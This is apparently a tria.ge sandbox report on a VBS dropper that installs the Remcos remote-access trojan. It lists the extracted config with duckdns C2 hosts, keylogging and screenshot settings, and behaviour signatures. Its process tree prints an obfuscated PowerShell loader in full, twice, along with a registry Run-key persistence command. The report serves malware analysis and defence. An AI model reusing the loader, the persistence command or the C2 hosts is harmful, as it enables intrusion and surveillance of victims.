Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

1

rAttached_updat.vbs

windows7-x64

8

rAttached_updat.vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    02/12/2024, 10:05

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    rAttached_updat.vbs

  • Size

    52KB

  • MD5

    6502323c58be777bd7cf1046ba20a468

  • SHA1

    51dc97fd8b87b03426c2b74f29a09e00897732d8

  • SHA256

    fb3c178a1787f26fcd75494463b9292bb1c7f76b465c7e78381dce5ed7c8011f

  • SHA512

    bf570c92c5b80a9d94cc1d4cfa2cd4596b8bbaf0e992427448f54cd83bea2e6867f1eac623d0108f241f7de039c1fc07b87d98cef8232ce2366a3fe030c5011c

  • SSDEEP

    384:I5cVCJUYlJPLpoCuPmKOF5OXOlaNyPepflkhiG0gkIENdy3w7u:I5cXYlJPLyCuOKEwtyPenNGO3Ndy3wi

Score
10/10
remcosfreshdiscoveryexecutionpersistencerat

Malware Config

Extracted

Family

remcos

Botnet

Fresh

C2

dourtes4hnbouy1.duckdns.org:2487

dourtes4hnbouy1.duckdns.org:2488

dourtes4hnbouy2.duckdns.org:2487

dourtes4hnbouy3.duckdns.org:2487

dourtes4hnbouy4.duckdns.org:2487
Attributes
  • audio_folder

    MicRecords

  • audio_path

    ApplicationPath

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    true

  • install_flag

    false

  • keylog_crypt

    false

  • keylog_file

    kamzourts.dat

  • keylog_flag

    false

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    kamncbiu-LBXP9X

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is a closed-source remote control and surveillance software.

    ratremcos
  • Remcos family
    remcos
  • Blocklisted process makes network request 8 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Using powershell.exe command.

    execution
  • Suspicious use of NtCreateThreadExHideFromDebugger 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 2 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies registry key 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious behavior: MapViewOfSection 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 12 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\rAttached_updat.vbs"
    1⤵
    • Blocklisted process makes network request
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4216
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Restudied='letfordrveliges';;$Homeotype='Skrupkulredes';;$Squawen='Unfork';;$Atelo101='Raakiddenes';;$Fredeliggjordes=$host.Name;function Uninhaled($Gripper){If ($Fredeliggjordes) {$Vaarbebuderes=5} for ($Damningness=$Vaarbebuderes;;$Damningness+=6){if(!$Gripper[$Damningness]) { break };$Periodicities+=$Gripper[$Damningness];$Damningnessnklinationers='rissle'}$Periodicities}function Foreslaaede($Kortlg){ .($Matindol) ($Kortlg)}$Prunt=Uninhaled 'Insoun CompEjabbet Rigs.G.stiW';$Prunt+=Uninhaled 'S mimEE bolb An aCC fwilEradiiPanioEJustinG usvT';$Modvgtens=Uninhaled 'footsM BoreoAmn sz VictiAfs.vlContelP,alaaAsper/';$Damningnessncommunicability=Uninhaled 'UnrepT.iltel ectosCircu1Crank2';$Fs='Herre[Blomsn ycloEPhenoTHaanl. Drifs T treTenserAutooVThymii hirac StrtEAndedp CryoOBayoni pilcnsolantserioMForesaDe.epn .esoa No dGPycn EStrepROvers]Mercu:Readj:DiencsAmatreripp CPyrotUPromprDu.liIMisauTGalacy Bkk pKursurResu.oPoochTtelefo elicEnsilO .autlBnnes=Faust$EdvardTjenea Be.tM PortnGennei SammNA,cidGDyrtbNToploEDroniSAgentSGimelNSynodcResono,arenmTilremJerntu,regeNSvr,eIvirilCfrafrA jrnBGua aIjernblSiv,iIPasseTKi afy';$Modvgtens+=Uninhaled 'Telef5Frems.Plads0Inhre Trust(G mmiWBas niAmerinGa dedStyrioForhawFricasBolig bekenNSk.llTSmaal Press1Spd a0Udmat.Resur0Vulga;Pa op SouarWAmeliiIrritnOutgr6 Rev,4 Vibr;Splej Bol.x laa6Stili4 ardi;Unove eforrUndervAnkep:Pro o1Giftb3Gunme1lolit.La ds0Bull )Mil,a LivsfG tidee LigacScattkBegreoUnask/ Efte2 An,a0.orfa1brioc0Und,r0baand1Monil0Linta1Modst SubstFSurfei smarrA,tome DuoefNem po kalex Mass/ Sk a1Ripar3 ylph1 Erhv. V nj0';$Tjreklles=Uninhaled 'GrandUtilskSGenopEAlterr Hass- ennea,ealigFor rEKitchNMell T';$Crabbiest2=Uninhaled 'SmidihHorn tReblatSec,npAwlwosM,lti:Circu/ Hubb/CaprisForf hUlt,aaSkrifaTegmiv DidniMorphp Domer utleoAfstdf snope.efensSponssPiratiBrydeoAnskan Bi.la utolKrved. SelvcSliknoniveambyzan/sgernFIndtrl Aitcl ForaeF rbisCurtafK steuOrat n Un rkMinimt SemiiA,mucoHrigenFdek eS bspnNonim. PummpBrdskc.enskz ene>BrisahForbrtNons.t egnpNglevs Frem: Hekt/Ryg t/Traved anseo KommwUpshonEjen tSagkyisne rmSubpueVirtudSondeoAbbrelProtol R ntaDadderLazybs vrme.Ny,tic iarioGoatimNyopr/SurpaF FordlDari l .hereDecu sMethufRoilyuOsmann IsurkUdtoltLnudji Afhao Undin opgiegleitnSnus .Sovsep IncocAflbsz';$Maximize=Uninhaled 'Ruin >';$Matindol=Uninhaled 'VarisI inhaEStemmx';$Liguorian52='Afmagrende';$Arbitration='\Oversigtslisternes.Nut';Foreslaaede (Uninhaled 'In ib$J.gerGNonspL SubroUsi kbBottoa oresLInsti: estR Omo aDispoP SjamgKystsRInne SBreakSMadr,eDeltiTForly1 Ultr3Musik6 Diss=Halsu$Smr le t,atNVesicvthero:Mausoa Sko.p Pre PJ,xieDBefriaGalacT FrocaStier+ Trks$TruttACr,mnrNaturbVagttiLe,ettAffirrPangeAAnvilTGen tISkrpeOSecurn');Foreslaaede (Uninhaled 'Reifi$ conGtilstL,yomeOSnyltbcesarANeovilExper: estas ElimTStiffo Crudf,maagsLi lek GulgiLfterfLot,ntP.rioe CarirRelatNdis.bESiphoSAdspr=Afgif$Udkrscatta rY tria alapbLoudeBGordyIFratrESlagbsUnincTColl 2Banke.HviskS bor P izdL ArkoIGenaaTOverj(Hydat$StoltmGtef A N.nsxMyrmeiTolermVedliiTonalzMontieTildn)');Foreslaaede (Uninhaled $Fs);$Crabbiest2=$Stofskifternes[0];$Upboils=(Uninhaled 'Under$MorergCeritLTriguoGysenB.holeaSvabel Thur:An elCLukreodr.ina .orttDagske HartRStaa s mbar=Gapotn Undee HoppWInstr-CriopOB.sjabDisscjForsteDupliCSols,T Temp AzomesRe ioYEnsuiSTil kT oachEDyrtiMToldb.Fors.$IsbaaPAcronRPressUHejseNViljet');Foreslaaede ($Upboils);Foreslaaede (Uninhaled 'Borep$Ran pcMiscloDsighaRo,gst B,ske RockrAnsp,sM gno.ShrieHafladeC nflaaffeddSpecteHo inrophi sSttys[Wakhi$BinomTMyl.rj Levir Harce DepokGend l .riklCompoeInversZ.gmu] lgev=Femkr$CiselM Tae oHypoidPreimv unmagFlokstLinieeDoctrn Stens');$Statesman=Uninhaled 'Orthe$ Le ec AfstoUndliaK.ngetInsaleStorhr Polysgly o.AlcidDTuricoBobspwTh.isnThymelSequeoUddela,uelldEly rF yreiFrgemloutbeeSubdi(Serph$Dir gCOpgrarTjeneaFornub Skulb.pigriSo.ubeUndissOv.retVidtl2Sus.a,Bedst$oliefJChefguNonapr TrreiLe ses jertppo tprBlseru SanidThuriedike,nafskecvrd,peFlatt)';$Jurisprudence=$Rapgrsset136;Foreslaaede (Uninhaled 'Scrut$AuntsGDesulLDidymoPe leBdaintaUdvejlFrein:LangbRTampeuTukanNShrimDUn ouI tillnOncesg Mon EA.tepRByssa=Sergi(Unwa tPolleeSamansSteu.TSamvi- SvejP CravAackn TUnlichbier Unni$tat rJ,aareU rear lindIo delSLacerp ma,arKjelduPintaDmidwiE AfslnJessecSkifteFilmh)');while (!$Rundinger) {Foreslaaede (Uninhaled ' Scuf$ Gra.gS.jerl Jocaoskjorb IngeaLivsflE yth:Mnj rGF ndarFil ou.hampnHep.tdOpladf NormlAf raa,ithsd IndbeHypoarResu aAkt.rdLightiEp,gruContrsCopaieVanadrH,lda=Fdsle$ RegeH Pulla,andeaStenonFdestdNo pehPje.svOpht eGigmalNonamsfis ueFysi sA.ilicKnei i Cu crWr stkSyvkauBrst.lSy ehrPr,vaeSma,ss') ;Foreslaaede $Statesman;Foreslaaede (Uninhaled 'T lensForvit akfeATebrertitanTUlykk-LusedS raadLV erdEPrioreAandspIrone Darli4');Foreslaaede (Uninhaled 'Trafi$SecreGIbereLKont oAkadeBOverbabe kilTria :SteurrHuttoUKampuNSymfoD Mi.fiInternRetruGInflue VarerBonde=ba be(UnfultPelsnEAftrkSDobbeTEjend- BedwpFelteA LitutReproHthrea Oplgs$Pennyj Som uupaakrAbsoliTheciSSonatpLoft r Fr mUCamoud SkabeLydsinOversCUnavaeReger)') ;Foreslaaede (Uninhaled 'Inds.$ PartGBomulLJesteoFruitbBoligAAntisl Dena:Va,reCAkrotOChlo,NBon oICrea,ORhizotStatsHFa tpyLianarGoddaIFin eUIn,onM Klud=Probl$Und sgS,cchl UkonoOutsiB k,stA Spiflafteg:InterFhorriaSpermCSam,ao yrmenRespeSAngiaTRetraaSaxhoaF rskLForsie ValltSamleS Medi+Nonan+Symm,%Ens,l$Luxemsno asTNazifOKul eFMi moS.phavKhurtiI probfVertetDemile DestRort.onAskrbe SammSStrad.,kattCFlailOHaa duAtominAssimT') ;$Crabbiest2=$Stofskifternes[$Coniothyrium]}$Silendes=310160;$Boligministerkollega=32341;Foreslaaede (Uninhaled 'Res o$ Routg Prool afteOO dinBLufttANonrelTown.:ForsaSKorreEFugeslJukebfGrdssMRatpro g sbV PervE AsthM In seSymasNGkantTJobna Unres= Cura NaturGHj taEOphidtPseud-HotpocSp ldosandhNOu,paTVi itECos on,behfTFacto Aflaa$FagotJSprjtUMyot rWa,taIUnf es BrowPDeterr s.aluEtn.lDCataceha.leNSummaC BranE');Foreslaaede (Uninhaled ' Mono$LearigHollalSynt oReindb .olsaJernflProc : ergaKRepubl T rio OverkC erukP.ehee Nonff MasoaBegyna,usserRemeesDjett Kjell=He er Orchi[ ryptSUdpanyAfmonssplattSu keeS.venmHvide. paraCMa leoF rtsn Hjemv Rec e atror AnistInsul] Bld,:Tredi:,lpinFCotarrEtbrroKle amD,sigBMesonaFlicksForbue,pide6Pyrob4HaderS ,opotA therSmus iIndkon FaargGenes(C nve$Sa miSSvmmeefodsvlPreomfMttermAc enoAthlevDroskeTotalmResoreH,lernhypert,isun)');Foreslaaede (Uninhaled 'Djvle$VanilG AntelSgel OPossiBAdresABeryll Dime:TrafieSuperI LiferDig.b Hypo=Fulde Fj rn[Tast,SDi ilyOversSThortt,astheDamasMS ilo.LabortD scrE Overx TutaTSands.Udvl.ESludpnEpiskcSteamoCardiDU.metiSoapsNPro,mGUtilf]Kosts:Mecat:WhinnAPuttesEnserc TophISkjorIFond..VerniGSgeruEBadentPucafsOrganTSca cr elecIOvercN IndogFooyu(Ep sk$ Vol,kfluteLSmr koMadniK Gradk oyalEFiumaf leta.issaa.elysrU trkSAnkla)');Foreslaaede (Uninhaled ' e to$ PettGMetabl Mac.OEnganbCatecATil alIsole:IdeolSVen imStupaIOp.raTK,emhTStolees,illDLejerESong sDokk,= nflj$OpslieWoldliPostvR ava.TopposRejesUUncucBForgaS MakeTHalvgrContriDecasNTank gPaste( Lunt$Over.s Unc,i rivL afklERek inCar nd Udb eUdganSReind, Aggr$,isprBConseoVapoul .onjI Al igIntramBuddhIAfpron Af.jIBestiS PranT A dre.pororOmvurKA thoOBondeL Wi tL NonfEWagweGShareaFaus.)');Foreslaaede $Smittedes;"
      2⤵
      • Blocklisted process makes network request
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3484
  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Restudied='letfordrveliges';;$Homeotype='Skrupkulredes';;$Squawen='Unfork';;$Atelo101='Raakiddenes';;$Fredeliggjordes=$host.Name;function Uninhaled($Gripper){If ($Fredeliggjordes) {$Vaarbebuderes=5} for ($Damningness=$Vaarbebuderes;;$Damningness+=6){if(!$Gripper[$Damningness]) { break };$Periodicities+=$Gripper[$Damningness];$Damningnessnklinationers='rissle'}$Periodicities}function Foreslaaede($Kortlg){ .($Matindol) ($Kortlg)}$Prunt=Uninhaled 'Insoun CompEjabbet Rigs.G.stiW';$Prunt+=Uninhaled 'S mimEE bolb An aCC fwilEradiiPanioEJustinG usvT';$Modvgtens=Uninhaled 'footsM BoreoAmn sz VictiAfs.vlContelP,alaaAsper/';$Damningnessncommunicability=Uninhaled 'UnrepT.iltel ectosCircu1Crank2';$Fs='Herre[Blomsn ycloEPhenoTHaanl. Drifs T treTenserAutooVThymii hirac StrtEAndedp CryoOBayoni pilcnsolantserioMForesaDe.epn .esoa No dGPycn EStrepROvers]Mercu:Readj:DiencsAmatreripp CPyrotUPromprDu.liIMisauTGalacy Bkk pKursurResu.oPoochTtelefo elicEnsilO .autlBnnes=Faust$EdvardTjenea Be.tM PortnGennei SammNA,cidGDyrtbNToploEDroniSAgentSGimelNSynodcResono,arenmTilremJerntu,regeNSvr,eIvirilCfrafrA jrnBGua aIjernblSiv,iIPasseTKi afy';$Modvgtens+=Uninhaled 'Telef5Frems.Plads0Inhre Trust(G mmiWBas niAmerinGa dedStyrioForhawFricasBolig bekenNSk.llTSmaal Press1Spd a0Udmat.Resur0Vulga;Pa op SouarWAmeliiIrritnOutgr6 Rev,4 Vibr;Splej Bol.x laa6Stili4 ardi;Unove eforrUndervAnkep:Pro o1Giftb3Gunme1lolit.La ds0Bull )Mil,a LivsfG tidee LigacScattkBegreoUnask/ Efte2 An,a0.orfa1brioc0Und,r0baand1Monil0Linta1Modst SubstFSurfei smarrA,tome DuoefNem po kalex Mass/ Sk a1Ripar3 ylph1 Erhv. V nj0';$Tjreklles=Uninhaled 'GrandUtilskSGenopEAlterr Hass- ennea,ealigFor rEKitchNMell T';$Crabbiest2=Uninhaled 'SmidihHorn tReblatSec,npAwlwosM,lti:Circu/ Hubb/CaprisForf hUlt,aaSkrifaTegmiv DidniMorphp Domer utleoAfstdf snope.efensSponssPiratiBrydeoAnskan Bi.la utolKrved. SelvcSliknoniveambyzan/sgernFIndtrl Aitcl ForaeF rbisCurtafK steuOrat n Un rkMinimt SemiiA,mucoHrigenFdek eS bspnNonim. PummpBrdskc.enskz ene>BrisahForbrtNons.t egnpNglevs Frem: Hekt/Ryg t/Traved anseo KommwUpshonEjen tSagkyisne rmSubpueVirtudSondeoAbbrelProtol R ntaDadderLazybs vrme.Ny,tic iarioGoatimNyopr/SurpaF FordlDari l .hereDecu sMethufRoilyuOsmann IsurkUdtoltLnudji Afhao Undin opgiegleitnSnus .Sovsep IncocAflbsz';$Maximize=Uninhaled 'Ruin >';$Matindol=Uninhaled 'VarisI inhaEStemmx';$Liguorian52='Afmagrende';$Arbitration='\Oversigtslisternes.Nut';Foreslaaede (Uninhaled 'In ib$J.gerGNonspL SubroUsi kbBottoa oresLInsti: estR Omo aDispoP SjamgKystsRInne SBreakSMadr,eDeltiTForly1 Ultr3Musik6 Diss=Halsu$Smr le t,atNVesicvthero:Mausoa Sko.p Pre PJ,xieDBefriaGalacT FrocaStier+ Trks$TruttACr,mnrNaturbVagttiLe,ettAffirrPangeAAnvilTGen tISkrpeOSecurn');Foreslaaede (Uninhaled 'Reifi$ conGtilstL,yomeOSnyltbcesarANeovilExper: estas ElimTStiffo Crudf,maagsLi lek GulgiLfterfLot,ntP.rioe CarirRelatNdis.bESiphoSAdspr=Afgif$Udkrscatta rY tria alapbLoudeBGordyIFratrESlagbsUnincTColl 2Banke.HviskS bor P izdL ArkoIGenaaTOverj(Hydat$StoltmGtef A N.nsxMyrmeiTolermVedliiTonalzMontieTildn)');Foreslaaede (Uninhaled $Fs);$Crabbiest2=$Stofskifternes[0];$Upboils=(Uninhaled 'Under$MorergCeritLTriguoGysenB.holeaSvabel Thur:An elCLukreodr.ina .orttDagske HartRStaa s mbar=Gapotn Undee HoppWInstr-CriopOB.sjabDisscjForsteDupliCSols,T Temp AzomesRe ioYEnsuiSTil kT oachEDyrtiMToldb.Fors.$IsbaaPAcronRPressUHejseNViljet');Foreslaaede ($Upboils);Foreslaaede (Uninhaled 'Borep$Ran pcMiscloDsighaRo,gst B,ske RockrAnsp,sM gno.ShrieHafladeC nflaaffeddSpecteHo inrophi sSttys[Wakhi$BinomTMyl.rj Levir Harce DepokGend l .riklCompoeInversZ.gmu] lgev=Femkr$CiselM Tae oHypoidPreimv unmagFlokstLinieeDoctrn Stens');$Statesman=Uninhaled 'Orthe$ Le ec AfstoUndliaK.ngetInsaleStorhr Polysgly o.AlcidDTuricoBobspwTh.isnThymelSequeoUddela,uelldEly rF yreiFrgemloutbeeSubdi(Serph$Dir gCOpgrarTjeneaFornub Skulb.pigriSo.ubeUndissOv.retVidtl2Sus.a,Bedst$oliefJChefguNonapr TrreiLe ses jertppo tprBlseru SanidThuriedike,nafskecvrd,peFlatt)';$Jurisprudence=$Rapgrsset136;Foreslaaede (Uninhaled 'Scrut$AuntsGDesulLDidymoPe leBdaintaUdvejlFrein:LangbRTampeuTukanNShrimDUn ouI tillnOncesg Mon EA.tepRByssa=Sergi(Unwa tPolleeSamansSteu.TSamvi- SvejP CravAackn TUnlichbier Unni$tat rJ,aareU rear lindIo delSLacerp ma,arKjelduPintaDmidwiE AfslnJessecSkifteFilmh)');while (!$Rundinger) {Foreslaaede (Uninhaled ' Scuf$ Gra.gS.jerl Jocaoskjorb IngeaLivsflE yth:Mnj rGF ndarFil ou.hampnHep.tdOpladf NormlAf raa,ithsd IndbeHypoarResu aAkt.rdLightiEp,gruContrsCopaieVanadrH,lda=Fdsle$ RegeH Pulla,andeaStenonFdestdNo pehPje.svOpht eGigmalNonamsfis ueFysi sA.ilicKnei i Cu crWr stkSyvkauBrst.lSy ehrPr,vaeSma,ss') ;Foreslaaede $Statesman;Foreslaaede (Uninhaled 'T lensForvit akfeATebrertitanTUlykk-LusedS raadLV erdEPrioreAandspIrone Darli4');Foreslaaede (Uninhaled 'Trafi$SecreGIbereLKont oAkadeBOverbabe kilTria :SteurrHuttoUKampuNSymfoD Mi.fiInternRetruGInflue VarerBonde=ba be(UnfultPelsnEAftrkSDobbeTEjend- BedwpFelteA LitutReproHthrea Oplgs$Pennyj Som uupaakrAbsoliTheciSSonatpLoft r Fr mUCamoud SkabeLydsinOversCUnavaeReger)') ;Foreslaaede (Uninhaled 'Inds.$ PartGBomulLJesteoFruitbBoligAAntisl Dena:Va,reCAkrotOChlo,NBon oICrea,ORhizotStatsHFa tpyLianarGoddaIFin eUIn,onM Klud=Probl$Und sgS,cchl UkonoOutsiB k,stA Spiflafteg:InterFhorriaSpermCSam,ao yrmenRespeSAngiaTRetraaSaxhoaF rskLForsie ValltSamleS Medi+Nonan+Symm,%Ens,l$Luxemsno asTNazifOKul eFMi moS.phavKhurtiI probfVertetDemile DestRort.onAskrbe SammSStrad.,kattCFlailOHaa duAtominAssimT') ;$Crabbiest2=$Stofskifternes[$Coniothyrium]}$Silendes=310160;$Boligministerkollega=32341;Foreslaaede (Uninhaled 'Res o$ Routg Prool afteOO dinBLufttANonrelTown.:ForsaSKorreEFugeslJukebfGrdssMRatpro g sbV PervE AsthM In seSymasNGkantTJobna Unres= Cura NaturGHj taEOphidtPseud-HotpocSp ldosandhNOu,paTVi itECos on,behfTFacto Aflaa$FagotJSprjtUMyot rWa,taIUnf es BrowPDeterr s.aluEtn.lDCataceha.leNSummaC BranE');Foreslaaede (Uninhaled ' Mono$LearigHollalSynt oReindb .olsaJernflProc : ergaKRepubl T rio OverkC erukP.ehee Nonff MasoaBegyna,usserRemeesDjett Kjell=He er Orchi[ ryptSUdpanyAfmonssplattSu keeS.venmHvide. paraCMa leoF rtsn Hjemv Rec e atror AnistInsul] Bld,:Tredi:,lpinFCotarrEtbrroKle amD,sigBMesonaFlicksForbue,pide6Pyrob4HaderS ,opotA therSmus iIndkon FaargGenes(C nve$Sa miSSvmmeefodsvlPreomfMttermAc enoAthlevDroskeTotalmResoreH,lernhypert,isun)');Foreslaaede (Uninhaled 'Djvle$VanilG AntelSgel OPossiBAdresABeryll Dime:TrafieSuperI LiferDig.b Hypo=Fulde Fj rn[Tast,SDi ilyOversSThortt,astheDamasMS ilo.LabortD scrE Overx TutaTSands.Udvl.ESludpnEpiskcSteamoCardiDU.metiSoapsNPro,mGUtilf]Kosts:Mecat:WhinnAPuttesEnserc TophISkjorIFond..VerniGSgeruEBadentPucafsOrganTSca cr elecIOvercN IndogFooyu(Ep sk$ Vol,kfluteLSmr koMadniK Gradk oyalEFiumaf leta.issaa.elysrU trkSAnkla)');Foreslaaede (Uninhaled ' e to$ PettGMetabl Mac.OEnganbCatecATil alIsole:IdeolSVen imStupaIOp.raTK,emhTStolees,illDLejerESong sDokk,= nflj$OpslieWoldliPostvR ava.TopposRejesUUncucBForgaS MakeTHalvgrContriDecasNTank gPaste( Lunt$Over.s Unc,i rivL afklERek inCar nd Udb eUdganSReind, Aggr$,isprBConseoVapoul .onjI Al igIntramBuddhIAfpron Af.jIBestiS PranT A dre.pororOmvurKA thoOBondeL Wi tL NonfEWagweGShareaFaus.)');Foreslaaede $Smittedes;"
    1⤵
    • Command and Scripting Interpreter: PowerShell
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious behavior: MapViewOfSection
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:688
    • C:\Windows\SysWOW64\msiexec.exe
      "C:\Windows\SysWOW64\msiexec.exe"
      2⤵
      • Blocklisted process makes network request
      • Suspicious use of NtCreateThreadExHideFromDebugger
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:4492
      • C:\Windows\SysWOW64\cmd.exe
        "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hyperspatial" /t REG_EXPAND_SZ /d "%Antiphlogistian% -windowstyle 1 $Palmitoleic=(gp -Path 'HKCU:\Software\Fedtprocenters\').slgtssagas;%Antiphlogistian% ($Palmitoleic)"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4432
        • C:\Windows\SysWOW64\reg.exe
          REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Hyperspatial" /t REG_EXPAND_SZ /d "%Antiphlogistian% -windowstyle 1 $Palmitoleic=(gp -Path 'HKCU:\Software\Fedtprocenters\').slgtssagas;%Antiphlogistian% ($Palmitoleic)"
          4⤵
          • Adds Run key to start application
          • System Location Discovery: System Language Discovery
          • Modifies registry key
          PID:3632

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    1KB

    MD5

    57fbd8e8eadfdf30244758b2810c1c59

    SHA1

    6527e634e5be730011f92d0eb13286cb02207948

    SHA256

    a63516cde57dfc0f88f6bb5a11ee13d45f5e17e32657d687a7c2908e10970916

    SHA512

    ba7cf9a6be1edcff72ee519ebe91450c9613305882febf4a89a92412758fddf2de7dc5475186683d74c6478b7b6f24f58fd6a36d8b75c63a6df022996ba83991

    Download Submit

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tyomcvjp.10v.ps1
    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    Download Submit

  • C:\Users\Admin\AppData\Roaming\Oversigtslisternes.Nut
    Filesize

    445KB

    MD5

    abcbb25c003afd9afc598e5628e22953

    SHA1

    d8a2b04050264aaab4491dc2c5125c23609d1533

    SHA256

    47b59e11d1bbaf43c7d8b5f52846709c034025e9bdeb98a126dc49579813f4cf

    SHA512

    f683bf82869ae29b2f9c11ee6030426aca36699f4e1bf0e936bef64e30517da4030d5cb6ee75c623ea6d4fbf441913a69e680c58e30f94e3e15dd7901d9e1a4b

    Download Submit

  • memory/688-43-0x0000000007D90000-0x000000000840A000-memory.dmp

    Filesize

    6.5MB

    Download

  • memory/688-39-0x0000000005F60000-0x00000000062B4000-memory.dmp

    Filesize

    3.3MB

    Download

  • memory/688-49-0x0000000008F70000-0x000000000D6DC000-memory.dmp

    Filesize

    71.4MB

    Download

  • memory/688-47-0x00000000089C0000-0x0000000008F64000-memory.dmp

    Filesize

    5.6MB

    Download

  • memory/688-46-0x0000000007770000-0x0000000007792000-memory.dmp

    Filesize

    136KB

    Download

  • memory/688-45-0x00000000077E0000-0x0000000007876000-memory.dmp

    Filesize

    600KB

    Download

  • memory/688-25-0x0000000002C00000-0x0000000002C36000-memory.dmp

    Filesize

    216KB

    Download

  • memory/688-26-0x00000000056F0000-0x0000000005D18000-memory.dmp

    Filesize

    6.2MB

    Download

  • memory/688-27-0x0000000005670000-0x0000000005692000-memory.dmp

    Filesize

    136KB

    Download

  • memory/688-28-0x0000000005D90000-0x0000000005DF6000-memory.dmp

    Filesize

    408KB

    Download

  • memory/688-29-0x0000000005EF0000-0x0000000005F56000-memory.dmp

    Filesize

    408KB

    Download

  • memory/688-44-0x0000000006AB0000-0x0000000006ACA000-memory.dmp

    Filesize

    104KB

    Download

  • memory/688-42-0x0000000006550000-0x000000000659C000-memory.dmp

    Filesize

    304KB

    Download

  • memory/688-41-0x0000000006530000-0x000000000654E000-memory.dmp

    Filesize

    120KB

    Download

  • memory/3484-15-0x00007FF9F5A70000-0x00007FF9F6531000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3484-4-0x00007FF9F5A73000-0x00007FF9F5A75000-memory.dmp

    Filesize

    8KB

    Download

  • memory/3484-16-0x00007FF9F5A70000-0x00007FF9F6531000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3484-24-0x00007FF9F5A70000-0x00007FF9F6531000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3484-21-0x00007FF9F5A70000-0x00007FF9F6531000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3484-18-0x00007FF9F5A70000-0x00007FF9F6531000-memory.dmp

    Filesize

    10.8MB

    Download

  • memory/3484-14-0x000001F47F120000-0x000001F47F142000-memory.dmp

    Filesize

    136KB

    Download

  • memory/3484-17-0x00007FF9F5A73000-0x00007FF9F5A75000-memory.dmp

    Filesize

    8KB

    Download

  • memory/4492-59-0x0000000000DD0000-0x0000000002024000-memory.dmp

    Filesize

    18.3MB

    Download